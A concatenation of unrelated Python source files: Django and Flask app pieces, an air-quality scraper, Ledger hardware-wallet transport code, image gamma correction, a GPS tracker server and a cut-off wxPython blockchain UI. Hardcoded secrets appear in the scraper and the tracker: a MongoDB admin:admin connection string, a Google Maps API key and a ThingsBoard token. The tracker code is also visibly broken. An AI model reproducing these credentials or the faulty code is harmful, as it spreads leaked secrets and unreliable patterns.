data_shuffe = pkl.load(open(path+'/data_shuffle', 'rb'))
seq_control_shuffle=[]
for k in data_shuffe:
seq_control_shuffle.append(k[1].item())
seq_control_original=[]
for k in train_data:
seq_control_original.append(k[1].item())
#
#seq_control_block=[]
#for k in shuffledblock:
# seq_control_block.append(k[1].item())
#
#
#
#
#
#
|
from django.conf import settings
from django.utils import timezone
from api.user.constants import USER_ACTIVITY_EVENT_TYPES
from api.user.models import UserActvitiyLog
class UserActivityLogMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
return self.get_response(request)
def process_request(self, request):
if request.user.is_authenticated():
user = request.user
local_timezone = settings.LOCAL_TIME_ZONE
# if first activity today at LOCAL_TIME_ZONE
# midnight at timezone astimezone
start_of_day = (
timezone.now()
.astimezone(local_timezone)
.replace(hour=0, minute=0, second=0, microsecond=0)
)
last_activity = user.profile.last_activity
if (last_activity) and (last_activity < start_of_day):
UserActvitiyLog.objects.create(
user=request.user,
event_type=USER_ACTIVITY_EVENT_TYPES.END_DAY_ACTIVITY,
event_description="End of day activity",
event_time=last_activity,
)
new_last_activity = timezone.now()
UserActvitiyLog.objects.create(
user=request.user,
event_type=USER_ACTIVITY_EVENT_TYPES.START_DAY_ACTIVITY,
event_description="Start day activity",
event_time=new_last_activity,
)
profile = user.profile
profile.last_activity = new_last_activity
profile.save()
return None
|
# -*- coding:utf-8 -*-
from . import FlaskConfig
class DevelopmentConfig(FlaskConfig):
"""开发模式下的配置"""
# 查询时会显示原始SQL语句
SQLALCHEMY_ECHO = True
ENV = 'development'
|
# -*- coding:utf8 -*-
"""
Created on 16/9/26 上午11:46
@author: fmc
"""
from __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function
import logging
from rest_framework import serializers
from ..models.cluster import ClusterModel, ClusterTemplateModel, ClusterTemplateVersionModel
from ..models.swimlane import SwimlaneModel
from ..models.host import HostModel, HostModelModel
from ..models.product import AppIdModel
from omni.libs.django_rest_framework.relations import FullObjectPrimaryKeyRelatedField
from omni.libs.django_rest_framework.serializers import CommonExtModelSerializer
log = logging.getLogger(__name__)
class ClusterModelSerializer(CommonExtModelSerializer):
serializer_related_field = FullObjectPrimaryKeyRelatedField
class Meta:
model = ClusterModel
depth = 1
class ClusterTemplateModeSerializer(CommonExtModelSerializer):
serializer_related_field = FullObjectPrimaryKeyRelatedField
class Meta:
model = ClusterTemplateModel
depth = 1
class ClusterTemplateVersionModeSerializer(CommonExtModelSerializer):
serializer_related_field = FullObjectPrimaryKeyRelatedField
class Meta:
model = ClusterTemplateVersionModel
depth = 1
def update(self, instance, validated_data):
host_model_id = self.validate_foreign_key_field(self.initial_data.get('host_model'))
if host_model_id and not host_model_id == instance.host_model_id:
instance.host_model = HostModelModel.objects.get(pk=host_model_id)
instance = super(ClusterTemplateVersionModeSerializer, self).update(instance, validated_data)
app_id_list = self.validate_many_to_many_field(self.initial_data.getlist('app_id'))
instance_appid_id_list = [appid_obj.id for appid_obj in instance.app_id.all()]
instance_appid_id_list.sort()
if app_id_list and not app_id_list == instance_appid_id_list:
log.error('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')
instance.app_id = ClusterTemplateVersionModel.objects.filter(pk__in=app_id_list)
log.error('yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy')
return instance
def create(self, validated_data):
pass
|
from dateutil.parser import parse
from datetime import datetime
import pandas as pd
import numpy as np
import hashlib
import time
import datetime
from datetime import date, timedelta
import requests, re, json
import bs4
from bs4 import BeautifulSoup
import pymongo
from pymongo import MongoClient
from apscheduler.schedulers.blocking import BlockingScheduler
sched = BlockingScheduler()
def getLocationCode(location):
locaList=[['causewaybay',0],['central',1],['central/western',2],['eastern',3]
,['kwaichung',4],['kwuntong',5],['mongkok',6],['shamshuipo',7]
,['shatin',8],['',9],['taipo',10],['tapmun',11],['tseungkwano',12]
,['tsuenwan',13],['tuenmun',14],['tungchung',15],['yuenlong',16]]
location = location.replace(' ','').casefold()
for value in locaList:
if value[0]==location:
return value[1]
return 17
@sched.scheduled_job('interval', minutes=30)
def job1():
print ("%s: job" % time.asctime())
df = pd.DataFrame(columns=['dateTime','location','NO2','O3','SO2','CO','PM10','PM2.5'])
web = ['http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration45fd.html?stationid=80',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentratione1a6.html?stationid=73',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationfb71.html?stationid=74',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationdb46.html?stationid=66',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration30e8.html?stationid=72',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration228e.html?stationid=77',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration0b35.html?stationid=83',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration1f2c.html?stationid=70',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration537c.html?stationid=82',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationf322.html?stationid=78',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration6e9c.html?stationid=69',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration2c5f.html?stationid=75',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration233a.html?stationid=76',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration5ca5.html?stationid=71',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentrationf9dd.html?stationid=79',
'http://www.aqhi.gov.hk/en/aqhi/past-24-hours-pollutant-concentration9c57.html?stationid=81']
location = ['Central/western','Eastern','Kwun Tong','Sham Shui Po',
'Kwai Chung','Tsuen Wan','Tseung Kwan O','Yuen Long',
'Tuen Mun','Tung Chung','Tai Po','Sha Tin',
'Tap Mun','Causeway Bay','Central','Mong Kok']
for url,i in zip(web,location):
res = requests.get(url)
html = requests.get(url).text.encode('utf-8-sig')
md5 = hashlib.md5(html).hexdigest()
if '/' in i:
path = './data2/'+i.split('/')[0]+i.split('/')[1]+'.txt'
else:
path = './data2/'+i+'.txt'
if False:
print('Unchanged data ~')
else:
sp = BeautifulSoup(res.text, 'html.parser')
data = sp.find_all('td',{'class':'H24C_ColDateTime'})
data1= sp.find_all('td',{'class':'H24C_ColItem'})
dateTime = [str(dt.text) for dt in data]
dateTime = [re.sub('\xa0',' ',i) for i in dateTime]
data1 = np.array([str(dt.text) for dt in data1]).reshape(int(len(data1)/6),6)
df1 = pd.DataFrame(data1,columns=['NO2','O3','SO2','CO','PM10','PM2.5'])
df1['dateTime'] = dateTime
df1['location'] = i
df1 = df1.rename(columns={'PM2.5': 'PM25'})
client = MongoClient('mongodb://admin:admin@cluster0-shard-00-00-9eks9.mongodb.net:27017,cluster0-shard-00-01-9eks9.mongodb.net:27017,cluster0-shard-00-02-9eks9.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true')
db = client['fyp']
collection = db.airPollution
l1 = []
for i in range(0,len(df1)):
l2={ 'dateTime':parse(df1['dateTime'][i]),
'location':df1['location'][i],
'locationCode':getLocationCode(df1['location'][i]),
'NO2':df1['NO2'][i],
'O3':df1['O3'][i],
'SO2':df1['SO2'][i],
'CO':df1['CO'][i],
'PM10':df1['PM10'][i],
'PM25':df1['PM25'][i]
}
query = {'dateTime':parse(df1['dateTime'][i]),'locationCode':getLocationCode(df1['location'][i])}
if (collection.find(query).count()==0):
inputdata = collection.insert_one(l2)
l1.append(l2)
@sched.scheduled_job('interval', minutes=30)
def job2():
res=requests.get('http://www.aqhi.gov.hk/epd/ddata/html/out/aqhi_ind_rss_Eng.xml')
html = requests.get('http://www.aqhi.gov.hk/epd/ddata/html/out/aqhi_ind_rss_Eng.xml').text.encode('utf-8-sig')
md5 = hashlib.md5(html).hexdigest()
if False:
print('Unchanged data ~')
else:
# type(res)
# res.text
soup = bs4.BeautifulSoup(res.text,'lxml')
# type(soup)
aqhi = soup.select('title')
location= soup.select('pubdate')
for x in range(2,len(aqhi)):
y=[int(s) for s in aqhi[x].getText().split() if s.isdigit()]
# conn=MongoClient('mongodb+srv://admin:admin@cluster0-fstcx.mongodb.net/test?retryWrites=true')
conn=MongoClient('mongodb://admin:admin@cluster0-shard-00-00-9eks9.mongodb.net:27017,cluster0-shard-00-01-9eks9.mongodb.net:27017,cluster0-shard-00-02-9eks9.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true')
collection=conn.fyp.currentAQHI
emp_rec={
"time": parse(location[0].getText().split(' +0800')[0].split(',')[1]),
"location":aqhi[x].getText().split(':')[0],
"aqhi":aqhi[x].getText().split(':')[1],
"locationCode":getLocationCode(aqhi[x].getText().split(':')[0])
}
print(location[0].getText())
print(y)
print(aqhi[x].getText())
# Insert Data
query = {'time':parse(location[0].getText().split(' +0800')[0].split(',')[1]),
'locationCode':getLocationCode(aqhi[x].getText().split(':')[0])}
if (collection.find(query).count()==0):
rec=collection.insert_one(emp_rec)
#print data saved
cursor=collection.find()
for record in cursor:
print(record)
job1()
job2()
sched.start()
# scheduler.add_job(job1, 'interval', minutes=30 )
# scheduler.add_job(job2, 'interval', minutes=30 )
# scheduler.start() |
from django.db import models
from django.contrib.auth.models import User
Category = [
('データサイエンス', 'DataScience'),
('機械学習', 'Machine Learning'),
('ディープラーニング', 'Deep Learning'),
('データ分析', 'Data Analysis'),
('Python 基礎', 'Python Basic'),
('Django', 'Django'),
('環境構築', 'environ_set'),
('その他', 'etc')
]
class History(models.Model):
title = models.CharField(max_length=100)
summary = models.TextField(max_length=500)
ContentSubtitle1 = models.CharField(max_length=100)
Content1 = models.TextField(max_length=500, blank=True, null=True)
ContentSubtitle2 = models.CharField(max_length=100, blank=True, null=True)
Content2 = models.TextField(max_length=500, blank=True, null=True)
ContentSubtitle3 = models.CharField(max_length=100, blank=True, null=True)
Content3 = models.TextField(max_length=500, blank=True, null=True)
ContentSubtitle4 = models.CharField(max_length=100, blank=True, null=True)
Content4 = models.TextField(max_length=500, blank=True, null=True)
ContentSubtitle5 = models.CharField(max_length=100, blank=True, null=True)
Content5 = models.TextField(max_length=500, blank=True, null=True)
images = models.ImageField(upload_to='images/', blank=True, null=True)
category = models.CharField(max_length=30, choices=Category)
author = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
|
from django.urls import path
import cart.views
urlpatterns = [
path('add/<kimchi_id>', cart.views.add_to_cart, name="add_to_cart_route"),
path('view/', cart.views.view_cart, name="view_cart_route"),
path('remove/<kimchi_id>', cart.views.remove_from_cart,
name="remove_from_cart_route"),
path('update_quantity/<kimchi_id>', cart.views.update_quantity,
name="update_quantity_route")
]
|
"""
*******************************************************************************
* Ledger Blue
* (c) 2016 Ledger
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
********************************************************************************
"""
from binascii import hexlify
import hid
import os
import time
import sys
import nfc
from nfc.clf import RemoteTarget
from .commException import CommException
from .commHTTP import getDongle as getDongleHTTP
from .commTCP import getDongle as getDongleTCP
from .commU2F import getDongle as getDongleU2F
from .Dongle import Dongle, DongleWait, TIMEOUT
from .ledgerWrapper import wrapCommandAPDU, unwrapResponseAPDU
from .BleComm import BleDevice
APDUGEN=None
if "APDUGEN" in os.environ and len(os.environ["APDUGEN"]) != 0:
APDUGEN=os.environ["APDUGEN"]
# Force use of U2F if required
U2FKEY=None
if "U2FKEY" in os.environ and len(os.environ["U2FKEY"]) != 0:
U2FKEY=os.environ["U2FKEY"]
# Force use of MCUPROXY if required
MCUPROXY=None
if "MCUPROXY" in os.environ and len(os.environ["MCUPROXY"]) != 0:
MCUPROXY=os.environ["MCUPROXY"]
# Force use of TCP PROXY if required
TCP_PROXY=None
if "LEDGER_PROXY_ADDRESS" in os.environ and len(os.environ["LEDGER_PROXY_ADDRESS"]) != 0 and \
"LEDGER_PROXY_PORT" in os.environ and len(os.environ["LEDGER_PROXY_PORT"]) != 0:
TCP_PROXY=(os.environ["LEDGER_PROXY_ADDRESS"], int(os.environ["LEDGER_PROXY_PORT"]))
NFC_PROXY=None
if "LEDGER_NFC_PROXY" in os.environ:
NFC_PROXY=True
BLE_PROXY=None
if "LEDGER_BLE_PROXY" in os.environ:
BLE_PROXY=True
# Force use of MCUPROXY if required
PCSC=None
if "PCSC" in os.environ and len(os.environ["PCSC"]) != 0:
PCSC=os.environ["PCSC"]
if PCSC:
try:
from smartcard.Exceptions import NoCardException
from smartcard.System import readers
from smartcard.util import toHexString, toBytes
except ImportError:
PCSC = False
class HIDDongleHIDAPI(Dongle, DongleWait):
def __init__(self, device, ledger=False, debug=False):
self.device = device
self.ledger = ledger
self.debug = debug
self.waitImpl = self
self.opened = True
def exchange(self, apdu, timeout=TIMEOUT):
if APDUGEN:
print(apdu.hex())
return b""
if self.debug:
print("HID => %s" % apdu.hex())
if self.ledger:
apdu = wrapCommandAPDU(0x0101, apdu, 64)
padSize = len(apdu) % 64
tmp = apdu
if padSize != 0:
tmp.extend([0] * (64 - padSize))
offset = 0
while offset != len(tmp):
data = tmp[offset:offset + 64]
data = bytearray([0]) + data
if self.device.write(data) < 0:
raise BaseException("Error while writing")
offset += 64
dataLength = 0
dataStart = 2
result = self.waitImpl.waitFirstResponse(timeout)
if not self.ledger:
if result[0] == 0x61: # 61xx : data available
self.device.set_nonblocking(False)
dataLength = result[1]
dataLength += 2
if dataLength > 62:
remaining = dataLength - 62
while remaining != 0:
if remaining > 64:
blockLength = 64
else:
blockLength = remaining
result.extend(bytearray(self.device.read(65))[0:blockLength])
remaining -= blockLength
swOffset = dataLength
dataLength -= 2
self.device.set_nonblocking(True)
else:
swOffset = 0
else:
self.device.set_nonblocking(False)
while True:
response = unwrapResponseAPDU(0x0101, result, 64)
if response is not None:
result = response
dataStart = 0
swOffset = len(response) - 2
dataLength = len(response) - 2
self.device.set_nonblocking(True)
break
result.extend(bytearray(self.device.read(65)))
sw = (result[swOffset] << 8) + result[swOffset + 1]
response = result[dataStart : dataLength + dataStart]
if self.debug:
print("HID <= %s%.2x" % (response.hex(), sw))
if sw != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
possibleCause = "Unknown reason"
if sw == 0x6982:
possibleCause = "Have you uninstalled the existing CA with resetCustomCA first?"
if sw == 0x6985:
possibleCause = "Condition of use not satisfied (denied by the user?)"
if sw == 0x6a84 or sw == 0x6a85:
possibleCause = "Not enough space?"
if sw == 0x6a83:
possibleCause = "Maybe this app requires a library to be installed first?"
if sw == 0x6484:
possibleCause = "Are you using the correct targetId?"
if sw == 0x6d00:
possibleCause = "Unexpected state of device: verify that the right application is opened?"
if sw == 0x6e00:
possibleCause = "Unexpected state of device: verify that the right application is opened?"
raise CommException("Invalid status %04x (%s)" % (sw, possibleCause), sw, response)
return response
def waitFirstResponse(self, timeout):
start = time.time()
data = ""
while len(data) == 0:
data = self.device.read(65)
if not len(data):
if time.time() - start > timeout:
raise CommException("Timeout")
time.sleep(0.0001)
return bytearray(data)
def apduMaxDataSize(self):
return 255
def close(self):
if self.opened:
try:
self.device.close()
except:
pass
self.opened = False
from nfc.tag.tt4 import Type4TagCommandError
NFC_CLA = 0x00
NFC_INS_WRITE = 0x5e
NFC_INS_READ = 0x5f
NFC_P1 = 0x00
NFC_P2 = 0x00
DEBUG_NFC_APDU = False
class DongleNFC(Dongle, DongleWait):
def __init__(self, debug = False):
self.waitImpl = self
self.opened = True
self.debug = debug
self.clf = nfc.ContactlessFrontend('usb')
self.tag = self.clf.connect(rdwr={'on-connect': lambda tag: False})
print(self.tag)
if self.tag.ndef is not None:
for record in self.tag.ndef.records:
print(record)
def _exchange_write(self, apdu, timeout=TIMEOUT):
success = False
nb_ex = 0
while success is False:
try:
if DEBUG_NFC_APDU:
debug = bytearray([NFC_CLA, NFC_INS_WRITE, NFC_P1, NFC_P2, len(apdu)]) + apdu
print(debug.hex())
response = self.tag.send_apdu(NFC_CLA, NFC_INS_WRITE, NFC_P1, NFC_P2, apdu, check_status=False)
if DEBUG_NFC_APDU:
print(response.hex())
sw = (response[-2] << 8) + response[-1]
if (sw&0xF000) != 0x9000 and (sw&0xFF00) != 0x6100 and (sw&0xFF00) != 0x6C00:
raise BaseException("Invalid status word received: " + hex(sw))
except Type4TagCommandError as ex:
if (nb_ex > 2):
raise ex
time.sleep(0.1)
nb_ex = nb_ex+1
continue
success = True
return response
def _exchange_read(self, timeout=TIMEOUT):
sw = 0x6100
nb_ex = 0
while sw == 0x6100:
try:
if DEBUG_NFC_APDU:
debug = bytearray([NFC_CLA, NFC_INS_READ, NFC_P1, NFC_P2])
print(debug.hex())
response = self.tag.send_apdu(NFC_CLA, NFC_INS_READ, NFC_P1, NFC_P2, None, check_status=False)
if DEBUG_NFC_APDU:
print(response.hex())
sw = (response[-2] << 8) + response[-1]
if (sw&0xF000) != 0x9000 and (sw&0xFF00) != 0x6100 and (sw&0xFF00) != 0x6C00:
raise BaseException("Invalid status word received: " + hex(sw))
except Type4TagCommandError as ex:
if (nb_ex > 2):
raise ex
time.sleep(0.1)
nb_ex = nb_ex+1
time.sleep(0.001)
return response
def exchange(self, apdu, timeout=TIMEOUT):
if self.debug:
print(f"[NFC] => {apdu.hex()}")
response = self._exchange_write(apdu, timeout)
sw = (response[-2] << 8) + response[-1]
if response != 0x9000:
response = self._exchange_read(timeout)
if self.debug:
print(f"[NFC] <= {response.hex()}")
return response
def apduMaxDataSize(self):
return 255
def close(self):
pass
class DongleBLE(Dongle, DongleWait):
def __init__(self, debug = False):
self.waitImpl = self
self.debug = debug
try:
self.device = BleDevice(os.environ['LEDGER_BLE_MAC'])
self.device.open()
except KeyError as ex:
sys.exit(f"Key Error\nPlease run 'python -m ledgerblue.BleComm' to select wich device to connect to")
self.opened = self.device.opened
def exchange(self, apdu, timeout=TIMEOUT):
if self.debug:
print(f"[BLE] => {apdu.hex()}")
response = self.device.exchange(apdu, timeout)
sw = (response[-2] << 8) + response[-1]
response = response[0:-2]
if self.debug:
print("[BLE] <= %s%.2x" % (response.hex(), sw))
if sw != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
possibleCause = "Unknown reason"
if sw == 0x6982:
possibleCause = "Have you uninstalled the existing CA with resetCustomCA first?"
if sw == 0x6985:
possibleCause = "Condition of use not satisfied (denied by the user?)"
if sw == 0x6a84 or sw == 0x6a85:
possibleCause = "Not enough space?"
if sw == 0x6a83:
possibleCause = "Maybe this app requires a library to be installed first?"
if sw == 0x6484:
possibleCause = "Are you using the correct targetId?"
if sw == 0x6d00:
possibleCause = "Unexpected state of device: verify that the right application is opened?"
if sw == 0x6e00:
possibleCause = "Unexpected state of device: verify that the right application is opened?"
self.close()
raise CommException("Invalid status %04x (%s)" % (sw, possibleCause), sw, response)
return response
def apduMaxDataSize(self):
return 0x99
def close(self):
self.device.close()
class DongleSmartcard(Dongle):
def __init__(self, device, debug=False):
self.device = device
self.debug = debug
self.waitImpl = self
self.opened = True
def exchange(self, apdu, timeout=TIMEOUT):
if self.debug:
print("SC => %s" % apdu.hex())
response, sw1, sw2 = self.device.transmit(toBytes(hexlify(apdu)))
sw = (sw1 << 8) | sw2
if self.debug:
print("SC <= %s%.2x" % (response.hex(), sw))
if sw != 0x9000 and (sw & 0xFF00) != 0x6100 and (sw & 0xFF00) != 0x6C00:
raise CommException("Invalid status %04x" % sw, sw, bytearray(response))
return bytearray(response)
def close(self):
if self.opened:
try:
self.device.disconnect()
except:
pass
self.opened = False
def getDongle(debug=False, selectCommand=None):
if APDUGEN:
return HIDDongleHIDAPI(None, True, debug)
if not U2FKEY is None:
return getDongleU2F(scrambleKey=U2FKEY, debug=debug)
elif MCUPROXY is not None:
return getDongleHTTP(remote_host=MCUPROXY, debug=debug)
elif TCP_PROXY is not None:
return getDongleTCP(server=TCP_PROXY[0], port=TCP_PROXY[1], debug=debug)
elif NFC_PROXY:
return DongleNFC(debug)
elif BLE_PROXY:
return DongleBLE(debug)
dev = None
hidDevicePath = None
ledger = True
for hidDevice in hid.enumerate(0, 0):
if hidDevice['vendor_id'] == 0x2c97:
if ('interface_number' in hidDevice and hidDevice['interface_number'] == 0) or ('usage_page' in hidDevice and hidDevice['usage_page'] == 0xffa0):
hidDevicePath = hidDevice['path']
if hidDevicePath is not None:
dev = hid.device()
dev.open_path(hidDevicePath)
dev.set_nonblocking(True)
return HIDDongleHIDAPI(dev, ledger, debug)
if PCSC:
connection = None
for reader in readers():
try:
connection = reader.createConnection()
connection.connect()
if selectCommand != None:
response, sw1, sw2 = connection.transmit(toBytes("00A4040010FF4C4547522E57414C5430312E493031"))
sw = (sw1 << 8) | sw2
if sw == 0x9000:
break
else:
connection.disconnect()
connection = None
else:
break
except:
connection = None
pass
if connection is not None:
return DongleSmartcard(connection, debug)
raise CommException("No dongle found")
|
'''
This module contains logic of pixel transforation.
which include gamma correction factor calualtion and transformation
logic.
Adaptive gamma correction techinqe
'''
import cv2
import numpy as np
import math
import logging
logger=logging.getLogger(__name__)
def calculate_gamma_factor(image):
'''
calculate gamma factor value of each frame using mean of HSR image
'''
gamma = 1
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hue, sat, val = cv2.split(hsv)
mid = 0.53
mean = np.mean(val)
meanLog = math.log(mean)
midLog = math.log(mid*255)
gamma =meanLog/midLog
logger.debug("mean: %s, meanlog: %s, midLog: %s, gamma: %s", mean,meanLog,midLog, gamma)
return gamma
def apply_brightness_adjustment_gamma(image):
"""
Adaptive gamma correction technique for brighness improvement
"""
gamma = calculate_gamma_factor(image)
#create lookup table for pixel trasnformation
lookUpTable = np.empty((1,256), np.uint8)
for i in range(256):
lookUpTable[0,i] = np.clip(pow(i / 255.0, gamma) * 255.0, 0, 255)
#Transformae the image
image_gamma = cv2.LUT(image, lookUpTable)
#logger.debug("Input Image: %s", image_gamma)
return image_gamma
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import sys
import struct
import json
import urllib2
def gmap(x,y, id):
f = open('/var/www/html/%s.html' % id,'w')
gmap_page = """
<!DOCTYPE html>
<html>
<body>
<h1>Your tracker at Electrodragon.com</h1>
<div id="googleMap" style="width:100%;height:400px;"></div>
<script>
function myMap() {
var mapProp= {
center:new google.maps.LatLng(%s, %s),
zoom:5,
};
var map=new google.maps.Map(document.getElementById("googleMap"),mapProp);
}
</script>
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDwTjLo9c8HjFhTLyApuFc_8IIehFQDSRg&callback=myMap"></script>
</body>
</html>
""" % (x, y)
f.writelines(gmap_page)
#return gmap_page
HOST = ''
PORT = 8100
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) ## reuse socket 8100
s.bind((HOST, PORT))
s.listen(5)
print 'Server start at: %s:%s' %(HOST, PORT)
print 'wait for connection...'
def httpsend(x, y):
data = {
"latitude": y,
"longitude": x,
"batteryLevel": "0",
"batteryCharging": "0"
}
credential = "qt6GZuEqH685HYzi8OlH"
addr = "demo.thingsboard.io:80"
req = urllib2.Request('http://%s/api/v1/%s/attributes' % (addr,credential) )
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
#print("data uploaded")
def findDATA(DATA):
result = codec_data.find(DATA) # find flag for lbs data
hexdata_1 = codec_data[result+8:result+16] #8
hexdata_2 = codec_data[result+16:result+24]
return hexdata_1, hexdata_2
def hexDEC(HEXdata):
decdata_1 = int(HEXdata[0],16)
decdata_2 = int(HEXdata[1],16)
return decdata_1, decdata_2
def restDATA():
hex_time = findDATA("00040006") # 12 long
hex_ID = findDATA("a0950006") # 12 lonhex_sn = findDATA("00010006") # 12 long
hex_sn_format = hex_sn[0]+hex_sn[1][0:4]
print ("HEX DATE 3L- Y-N-D: %s" % hex_time[0][0:6])
print ("HEX TIME 3L - H-M-S: %s" % hex_time[0][6:8]+hex_time[1][0:4])
print ("HEX pro_ID 3L: %s" % hex_ID[0]+hex_ID[1][0:4] )
print ("HEX user_SN 3L: %s" % hex_sn_format )
return hex_sn_format
def lbs_data(): # 16 , if find lbs
if codec_data.find("51400008") != -1:
DATA = findDATA("51400008") # find flag for lbs data 51400008
temp_lbs_lon = DATA[1] # longtitude X
temp_lbs_lat = DATA[0] # latitue Y
print ("HEX LBS 2x2L - X-Y: %s, %s" % (temp_lbs_lon, temp_lbs_lat))
decDATA = hexDEC(DATA)
lbs_lat = decDATA[1]/float(1000000.00)
lbs_lon = decDATA[0]/float(1000000.00)
print ("DEC LBS 2x2L - X-Y: %s, %s" % (lbs_lon, lbs_lat))
httpsend(lbs_lon, lbs_lat)
return lbs_lon, lbs_lat
else:
return False
def allDATA():
if lbs_data():
lbs_data = lbs_data()
rest_data = restDATA()
gmap(lbs_data[0], lbs_data[1], rest_data[0])
while True:
conn, addr = s.accept()
print 'Connected by ', addr
while True:
data = conn.recv(182) #182
codec_data = data.encode('hex')
print codec_data
print ("INFO: star_char-%s, version-%s, action-%s, pack_times-%s" % (codec_data[0:4], codec_data[4:12], codec_data[12:16], codec_data[16:20]) ) # simple print demo
allDATA()
conn.send("server received you message.")
|
import wx
from SeChainController.MainController import MainController
from SeChainController import Property
class MainApp(wx.App):
def OnInit(self):
frame = MainFrame()
frame.drow_frame(None, -1, 'Se-Chain')
frame.Show(True)
Property.ui_frame = frame
self.SetTopWindow(frame)
return True
class MainFrame(wx.Frame):
trust_node_panel = None
console_panel = None
console_text = ""
def __init__(self):
return None
def drow_frame(self, parent, id, title):
wx.Frame.__init__(self, parent, id, title, wx.DefaultPosition, wx.Size(700, 350))
vbox = wx.BoxSizer(wx.VERTICAL)
# console
self.console_panel = wx.Panel(self, -1)
self.console_text = wx.StaticText(self.console_panel, 9, "Console", (30, 15), (500, 90), style=wx.LEFT)
# menu
menubar = wx.MenuBar()
trx_menu = wx.Menu()
menubar.Append(trx_menu, '&Send Transaction')
trx_menu.Append(1, '&Send Data Transaction')
trx_menu.Append(2, '&Deploy Smart Contract')
trx_menu.Append(3, '&Run Smart Contract')
self.Bind(wx.EVT_MENU, self.send_transaction, id=1)
self.Bind(wx.EVT_MENU, self.deploy_contract, id=2)
self.Bind(wx.EVT_MENU, self.run_contract, id=3)
self.SetMenuBar(menubar)
# Welcome message
welcome_panel = wx.Panel(self, -1)
wx.StaticText(welcome_panel, 1, "Welcome to Se-Chain", (30, 15), style=wx.LEFT)
vbox.Add(welcome_panel, 0, wx.EXPAND)
# IP address
ip_panel = wx.Panel(self, -1)
ip_address = MainController.get_ip_address()
wx.StaticText(ip_panel, 1, "Your IP Address:" + Property.my_ip_address, (30, 30), style=wx.LEFT)
vbox.Add(ip_panel, 0, wx.EXPAND)
# Setting Trust Node Box
trust_node_box = wx.BoxSizer(wx.HORIZONTAL)
self.trust_node_panel = wx.Panel(self, -1)
self.set_trust_node_text()
trust_node_box.Add(self.trust_node_panel, 0, wx.EXPAND)
trust_node_text = wx.TextEntryDialog(self, '', 'Setting Trust Node')
trust_node_text.SetValue("Default")
trust_node_box.Add(trust_node_text, 0, wx.EXPAND)
trust_node_button = wx.Button(self, 1, '1. Set Trust Node')
trust_node_box.Add(trust_node_button, 1, wx.EXPAND)
vbox.Add(trust_node_box, 0, wx.EXPAND)
self.Bind(wx.EVT_BUTTON, self.set_trust_node, id=1)
#start
start_button = wx.Button(self, 3, "4. Se Chain Start")
vbox.Add(start_button, 0, wx.EXPAND)
self.Bind(wx.EVT_BUTTON, self.start_sechain, id=3)
#start
trust_start_button = wx.Button(self, 4, "*. Start Trust Node (if this is trust node)")
vbox.Add(trust_start_button, 0, wx.EXPAND)
self.Bind(wx.EVT_BUTTON, self.start_trust_node, id=4)
self.SetSizer(vbox)
self.Center()
#console
vbox.Add(self.console_panel, 1, wx.EXPAND)
def set_trust_node_text(self):
from SeChainController import Property
my_ip = Property.trust_node_ip
wx.StaticText(self.trust_node_panel, 1, "TrustNode : " + my_ip, (30, 30), style=wx.LEFT)
def set_trust_node(self, event):
from SeChainController import Property
dlg = wx.TextEntryDialog(self, '', 'Setting Trust Node')
dlg.SetValue(Property.trust_node_ip)
if dlg.ShowModal() == wx.ID_OK:
# need to validation check (IP format)
Property.trust_node_ip = dlg.GetValue()
self.set_trust_node_text()
dlg.Destroy()
self.write_console("Trust node is set")
def write_console(self, message):
Property.ui_frame.console_text.SetLabel(message)
def start_sechain(self, event):
# import thread
# thread.start_new_thread(MainController.initiate_node(), ("start_main_controller", 1))
MainController.initiate_node()
def start_trust_node(self, event):
print "My_ip : " + Property.my_ip_address
print "Trust_ip : " + Property.trust_node_ip
if Property.my_ip_address == Property.trust_node_ip :
self.write_console("start trust node")
MainController.node_start()
else:
self.write_console("This IP and trust node IP is not same")
def send_transaction(self, event):
if (Property.node_started == True):
trx_drg = wx.Dialog(None, title='Sending Transaction')
trx_drg.SetSize((500, 300))
trx_drg.SetTitle('Sending Transaction')
pnl = wx.Panel(trx_drg)
vbox = wx.BoxSizer(wx.VERTICAL)
